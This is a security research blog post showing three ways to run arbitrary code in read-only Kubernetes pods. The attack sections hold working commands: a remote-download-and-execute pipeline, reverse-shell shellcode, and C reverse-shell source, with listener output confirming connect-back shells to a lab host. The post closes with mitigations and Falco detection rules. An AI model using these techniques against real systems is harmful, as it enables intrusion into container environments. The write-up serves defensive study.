Executing Arbitrary Code & Executables in Read-Only FileSystems
By Golan Myers on 12 June 2023
The following research examines different methods of executing arbitrary code and executables in read-only file systems where writable folders are marked as noexec, focusing on pods within the Kubernetes context.
What Is A Read-Only File System and Why Should We Use It?
File system permissions typically make use of three main “actions” - read, write and execute. In a read-only file system, files can be read or executed (this varies based on multiple levels of permissions). However, writing to them or creating new files is not permitted even if a process has the correct permissions. This can prevent modification of existing data and attempts to write new data (such as malware) to the system.
Correctly configuring file systems as read-only could act as a security measure. This approach has been widely adopted in the world of containerisation, as it allows for better control and management of containerised applications. Immutable filesystems are consistent and predictable. This makes compliance and auditing simpler, and allows for more accurate threat detection.
Using Kubernetes, this can be set as part of a pod’s configuration file under the securityContext field by setting the readOnlyRootFilesystem value to true:
apiVersion: v1
kind: Pod
metadata:
name: alpine
spec:
containers:
- args:
- alpine
image: alpine
name: pod
command:
- "sleep"
- "60"
securityContext:
readOnlyRootFilesystem: true
What Approaches Can Be Taken by A Threat Actor with Access to A Read-Only Pod?
While a read-only file system presents an additional layer of complexity for an attacker, it could still prove useful in the construction of a successful attack chain. The pod acts as a foothold in the environment. Furthermore, it can be used to enumerate the environment from an internal perspective, and potentially as an intermediary used to communicate with additional resources.
The Attack
In our scenario, we are an attacker who has managed to gain a foothold on an application pod. However, the pod’s filesystem is read-only. To further this attack, we must be able to execute arbitrary code and executables on the pod. As such, all methods presume initial access to the target pod with a low privileged user. As our focus is the ability to execute arbitrary code and not the code itself, all the methods will be demonstrated using a simple reverse shell as a Proof of Concept (PoC).
Method #1
In our first scenario, we will be attempting to execute arbitrary code in a read-only pod, configured with the latest version of the standard Nginx image. This method requires /bin/bash being present on the pod.
The configuration for the pod is as follows:
apiVersion: v1
kind: Pod
metadata:
name: nginx
spec:
containers:
image: nginx:latest
name: nginx
securityContext:
readOnlyRootFilesystem: true
runAsUser: 101
ports:
- containerPort: 80
volumeMounts:
- mountPath: /var/run
name: run
- mountPath: /var/cache/nginx
name: nginx-cache
volumes:
- name: run
emptyDir: {}
- name: nginx-cache
emptyDir: {}
In the configuration file, we specify in the securityContext field the readOnlyRootFileSystem attribute in order to create a pod with a read-only file system. However, Nginx requires the ability to write to specific locations. Therefore, we specified designated volumes and volume mounts to account for this. Additionally, the runAsUser attribute has been used to ensure the pod runs as the low privileged Nginx user.
To make sure our configuration was successful, with the pod deployed, we can attempt to create a file:
nginx@nginx-8f44699b7-wbwx6:/$ touch test
touch: cannot touch 'test': Read-only file system
As an attacker with initial access to this pod, we now need to find a way to get our arbitrary code on the pod. This can be done at times using tools such as curl or wget, however our working assumption is that these are not available to us. Nonetheless, we can use Bash’s built in /dev/tcp utility. This is typically used to establish a TCP connection to a remote host, however it can also be used to establish an HTTP connection and retrieve a file. As Bash functions are stored in memory and not to the file system, the function can be invoked via terminal using the following code:
function __bindownload() {
read proto server path <<<$(echo ${1//// })
FILE=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=8080
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${FILE} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
Now we can upload files from our host to the pod. However, the file system will not allow for these files to be saved, as it is not possible to write to the read-only file system. In order to bypass this restriction, we will use the DDexec.sh script developed by Yago Gutierrez. This script allows for the hijacking of an existing process in order to replace it with our own code. However, for the attack to work, we must run everything simultaneously.
To achieve this, the __bindownload function can be used to retrieve DDexec.sh and our desired binary on the pod. Rather than downloading to disk, bash redirection can be used to immediately pass the downloaded binary to DDexec.sh for execution, again using __bindownload. This process avoids ever needing to write any files to the file system.
Victim
nginx@nginx-8f44699b7-wbwx6:/$ __bindownload http://192.168.255.137:8080/shell.b64 | bash <(__bindownload http://192.168.255.137:8080/ddexec.sh)
If we look at our server’s HTTP traffic we can see the pod’s requests for DDexec.sh and our desired binary:
┌──(newkalier㉿Newkalier)-[~/DDexec]
└─$ python3 -m http.server 8080 [Mar 02 2023 12:11:26]
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.255.1 - - [02/Mar/2023 12:14:09] "GET /ddexec.sh HTTP/1.0" 200 -
192.168.255.1 - - [02/Mar/2023 12:14:09] "GET /shell.b64 HTTP/1.0" 200 -
With the files downloaded and executed, looking at our listener we can see a shell:
┌──(newkalier㉿Newkalier)-[~]
└─$ nc -lvnp 9898 [Mar 02 2023 12:11:36]
listening on [any] 9898 ...
connect to [192.168.255.137] from (UNKNOWN) [192.168.255.1] 61782
hostname
nginx-8f44699b7-wbwx6
Method #2
OK, but what if we don’t even have bash in our container? In our second scenario, we will be adding a layer of complexity. Certain images commonly used in containerisation, such as Alpine, do not include Bash by default, but rather default to older shells such as sh. In these scenarios, we will not be able to use /dev/tcp as it is a Bash utility. Additionally, redirection involving multiple commands is limited.
For this scenario, we will be using a pod with the latest Alpine image using the following configuration:
apiVersion: v1
kind: Pod
metadata:
name: alpine
spec:
containers:
- args:
- alpine
image: alpine
name: pod
command:
- "sleep"
- "60"
securityContext:
runAsUser: 65534
readOnlyRootFilesystem: true
Once again, in the configuration file, we specify in the securityContext field the readOnlyRootFileSystem attribute in order to create a pod with a read-only file system. Additionally, we have instructed the pod to run using the low privileged Nobody user with the runAsUser attribute.
As in the previous method, we require a way to get our arbitrary code onto the pod. While exploring the /bin folder in the pod, we find the busybox binary. This is a lightweight software suite which is often used in container images due to its size and efficiency. It is found by default in images such as Alpine, Scratch and OpenWrt. One of the tools it offers is busybox wget, essentially a compact version of wget. In our case, it can be used to transfer a file from our host to the pod. However, as previously mentioned, redirection with multiple commands is trickier with sh, so we need to explore alternative avenues.
Using the mount command, we find there is an interesting file system that is writable: /dev/shm.
~ $ mount | grep shm
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/shm is a temporary file system (tmpfs) in Unix-like environments. It is used to implement the shared memory concept, allowing for an efficient means of passing data between programs. It is mounted as a virtual file system in memory. Due to its nature, any data stored in it will be lost upon system shut down. It is uncommon for /dev/shm to be mounted without write permissions (even in read-only systems) as this would impact the performance of inter-process communication.
Although it is writable, /dev/shm is marked as noexec, meaning anything we write to it cannot be executed directly.
In order to bypass this restriction, we will execute sh which is within an executable mount. This will read and write to files within /dev/shm, bypassing the need to execute from /dev/shm even when executing the sh scripts. For this attack, we will use the DDsc.sh script (also developed by Yago Gutierrez) which is similar to DDexec.sh but allows us to run shellcode directly.
First, we will use busybox wget to write DDsc.sh and our shellcode to temporary files in /dev/shm:
dde=$(mktemp -p /dev/shm)
busybox wget -O - https://raw.githubusercontent.com/arget13/DDexec/main/ddsc.sh > $dde
code=$(mktemp -p /dev/shm)
echo "6a2958996a025f6a015e0f05489748b90200270fc0a8ff89514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05" > $code
Next, we will use sh to read and execute DDsc.sh from /dev/shm, which will run our shellcode. This will result in a reverse shell from the pod to our host:
sh $dde -x < $code
┌──(newkalier㉿Newkalier)-[~]
└─$ nc -lvnp 9999 [Mar 02 2023 14:09:28]
listening on [any] 9999 ...
connect to [192.168.255.137] from (UNKNOWN) [192.168.255.1] 64653
hostname
alpine
Method #3
Our first 2 methods can be tricky to mitigate or detect. However, this is still possible. In our third scenario, we will be pursuing a separate path from the previous two. As in the previous method, we will be using a pod with the latest Alpine image configured as follows:
apiVersion: v1
kind: Pod
metadata:
name: alpine
spec:
containers:
- args:
- alpine
image: alpine
name: pod
command:
- "sleep"
- "60"
securityContext:
runAsUser: 65534
readOnlyRootFilesystem: true
In our final method, we will examine the ability to run executable files through dynamic linker/loader libraries without execute permissions. When an executable is launched or a shared library is loaded, the dynamic linker is responsible for linking the dynamic libraries at runtime as well as resolving symbols. We can find the dynamic linker under “Dynamic Program Loader” within the output of ldd for our pod:
~ $ ldd
musl libc (x86_64)
Version 1.2.3
Dynamic Program Loader
Usage: /lib/ld-musl-x86_64.so.1 [options] [--] pathname
Once we know what linker the system uses, in this case ld-musl-x86_64.so.1, we can create an executable to suite our needs. First, we will take a simple reverse shell written in C:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 9999;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("192.168.255.137");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
return 0;
}
Next, we will compile it using musl-gcc to suite our Dynamic Program Loader:
musl-gcc -pie ~/shell.c -o ~/shell
Before we can use our Dynamic Program Loader, we need a way to get our file onto the pod. When examining the file system using the mount command, you’ll notice multiple files are individually mounted as writeable as part of standard functionality. For example /etc/hosts:
~ $ mount | grep etc/hosts
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,discard,errors=remount-ro)
In addition to the /etc/hosts file, the /etc/resolv.conf and /etc/hostname are also commonly mounted with write permissions. However, all these files require elevated privileges (root) in order to write to them.
~ $ ls -l /etc/hosts
-rw-r--r-- 1 root root 203 Mar 2 14:00 /etc/hosts
One file which is commonly mounted with write permissions and does not require elevated privileges in order to write to is /dev/termination-log. In Kubernetes, a terminationMessagePath field can be specified in the configuration. This specifies a path from which to retrieve termination messages regarding the pod. When the field is not explicitly configured, the default value of /dev/termination-log is set.
~ $ mount | grep rw | grep sda
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,discard,errors=remount-ro)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,discard,errors=remount-ro)
~ $ ls -l /dev/termination-log
-rw-rw-rw- 1 root root 0 Mar 2 14:45 /dev/termination-log
We can again use busybox wget in order to get our file onto the pod by writing to the /dev/termination-log file:
~ $ busybox wget -O - http://192.168.255.137:8080/shell > /dev/termination-log
Connecting to 192.168.255.137:8080 (192.168.255.137:8080)
writing to stdout
- 100% |*********************************************************| 18152 0:00:00 ETA
written to stdout
Lastly, we will run the file using the Dynamic Program Loader, mitigating the typical requirement for executable file permissions:
Victim
~ $ ls -l /dev/termination-log
-rw-rw-rw- 1 root root 18152 Mar 2 15:02 /dev/termination-log
~ $ /lib/ld-musl-x86_64.so.1 /dev/termination-log
Kali
┌──(newkalier㉿Newkalier)-[~]
└─$ nc -lvnp 9999 [Mar 02 2023 15:03:45]
listening on [any] 9999 ...
connect to [192.168.255.137] from (UNKNOWN) [192.168.255.1] 64835
hostname
alpine
How Do We Prevent These Attacks?
Now that we’ve discussed some possible attack vectors, let’s talk about some mitigation options.
The first two methods use in-memory execution, and can be quite tricky to prevent. It is possible using SELinux in enforcement mode to prevent access to /proc/[pid]/mem or execmem. Unfortunately, using SELinux can be quite complex, and requires in-depth knowledge of the system and its configuration. As a result, many users and administrators choose not to use it, opting for simpler security mechanisms that may be less effective but easier to manage.
Our second option is detection. We can use tools such as falco in pods to detect execution of files from /dev/shm and trigger alerts. Additionally, we can use it to detect unexpected network connections. In the following examples, the first rule will trigger an alert with the warning priority (meaning it is potentially suspicious but not necessarily malicious) for most scenarios which result is the execution of a file which resides in /dev/shm. This rule was taken from Falco's library. However, we have added a condition saying proc.args contains "/dev/shm" or proc.cwd startswith "/dev/shm". Adversaries attempting to avoid detection may try to eliminate the need for file execution directly from the directory using tools such as cat, echo or base64. This condition was added to detect such processes, by searching for processes with /dev/shm as an argument. It should be noted that this rule may generate some false positive alerts. The second rule will trigger an alert with the warning priority whenever a process establishes an outgoing network connection to an IP which doesn’t match the IP ranges specified in the rule.
Detecting File Execution From /dev/shm
- rule: Execution from /dev/shm
desc: This rule detects file execution from the /dev/shm directory, a common tactic for threat actors to stash their readable+writable+(sometimes)executable files.
condition: >
spawned_process and
(proc.exe startswith "/dev/shm/" or
(proc.cwd startswith "/dev/shm/" and proc.exe startswith "./" ) or
(shell_procs and proc.args startswith "-c /dev/shm") or
(shell_procs and proc.args startswith "-i /dev/shm") or
(shell_procs and proc.args startswith "/dev/shm") or
(proc.args contains "/dev/shm" or proc.cwd startswith "/dev/shm") or
(proc.cwd startswith "/dev/shm/" and proc.args startswith "./" )) and
not container.image.repository in (falco_privileged_images, trusted_images)
output: "File execution detected from /dev/shm (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name user.loginuid=%user.loginuid container.id=%container.id evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.name=%container.name image=%container.image.repository)"
priority: WARNING
Detecting Unexpected Network Connections
- rule: Unexpected Outgoing Connection
desc: Detects unexpected outgoing connections
condition: >
(evt.type = connect and evt.dir=< and
fd.typechar='4' and
fd.sock_family != 'unix' and
(not fd.ip in (127.0.0.1, 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12))
)
output: >
Unexpected outgoing connection from process %(proc.name) to %(fd.ip)
priority: WARNING
We can use the second falco rule above to detect anomalous network connections being established when an attacker attempts to get DDExec.sh, DDsc.sh or the compiled code on to the pod. Additionally, for the final method, the termination log’s location should be mounted with the noexec option.
Conclusion
Creating containers with read-only file systems IS recommended and can be useful as an additional layer of security. However, this solution does not make containers magically secure. Container security is complex and requires multiple layers of defence comprising of active restrictions, monitoring, and alerting. There is no “one-size fits all” solution, as different environments will require different capabilities. Therefore, each environment must be viewed individually, and only once it’s requirements are fully understood, a security solution should be tailored for it.
References
[1] DDexec/DDsc:
https://github.com/arget13/DDexec
[2] SELinux Project:
https://selinuxproject.org/page/ObjectClassesPerms#memprotect
[3] Kubernetes Docs:
https://kubernetes.io/docs/home/
[4] The Falco Project:
https://falco.org/